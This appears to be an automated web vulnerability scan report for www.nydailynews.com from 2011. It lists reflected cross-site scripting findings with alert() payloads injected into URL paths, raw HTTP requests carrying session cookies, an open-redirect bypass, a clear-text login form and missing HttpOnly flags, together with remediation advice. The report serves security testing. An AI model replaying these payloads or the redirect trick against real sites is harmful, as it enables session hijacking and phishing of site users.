GET /nydn/dwr/interface/mostPopularStories.js601fb<script>alert(1)</script>a6fb0fe92da HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46158'%3balert(1)//563fa04117e was submitted in the REST URL parameter 1. This input was echoed as 46158';alert(1)//563fa04117e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn46158'%3balert(1)//563fa04117e/dwr/util.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:32:30 GMT Server: Apache Keep-Alive: timeout=3, max=991 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70207
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc0e7'%3balert(1)//05d3c538398 was submitted in the REST URL parameter 1. This input was echoed as dc0e7';alert(1)//05d3c538398 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydndc0e7'%3balert(1)//05d3c538398/emailArticle.do HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:49 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70086
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24725'%3balert(1)//ff55bae047e was submitted in the REST URL parameter 1. This input was echoed as 24725';alert(1)//ff55bae047e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d358a'%3balert(1)//dc530969488 was submitted in the REST URL parameter 1. This input was echoed as d358a';alert(1)//dc530969488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real_estated358a'%3balert(1)//dc530969488/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:35:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d645'%3balert(1)//e32d4ea5441 was submitted in the REST URL parameter 2. This input was echoed as 3d645';alert(1)//e32d4ea5441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real_estate/index.html3d645'%3balert(1)//e32d4ea5441 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:35:43 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86331'%3balert(1)//aec1888faef was submitted in the REST URL parameter 1. This input was echoed as 86331';alert(1)//aec1888faef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services86331'%3balert(1)//aec1888faef/apps/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70095
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23e21'%3balert(1)//5b3720694d4 was submitted in the REST URL parameter 2. This input was echoed as 23e21';alert(1)//5b3720694d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps23e21'%3balert(1)//5b3720694d4/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70095
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d800'%3balert(1)//c1735182a1c was submitted in the REST URL parameter 3. This input was echoed as 7d800';alert(1)//c1735182a1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps/ipad7d800'%3balert(1)//c1735182a1c/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:33 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70093
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16cdc'%3balert(1)//12dd587eaf8 was submitted in the REST URL parameter 4. This input was echoed as 16cdc';alert(1)//12dd587eaf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/apps/ipad/redir.html16cdc'%3balert(1)//12dd587eaf8 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:48 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70093
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac72'%3balert(1)//2c3425a1503 was submitted in the REST URL parameter 1. This input was echoed as bac72';alert(1)//2c3425a1503 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homedeliverybac72'%3balert(1)//2c3425a1503/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 69852
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.nydailynews.com/nydn/login.do
The form contains the following password field:
password
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 08 Feb 2011 18:28:38 GMT Connection: close Content-Length: 40694
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .ad22d5cbb6a586667/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Remediation background
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /real_estate/index.html?.ad22d5cbb6a586667/=1 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://bestplaces.nydai ...[SNIP]...
4. Cookie without HttpOnly flag setpreviousnext There are 17 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/abuse!default.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/communityjs/44?forum=13&key=2748c8d6e1b10496a67bf33d97fa3d8e HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; 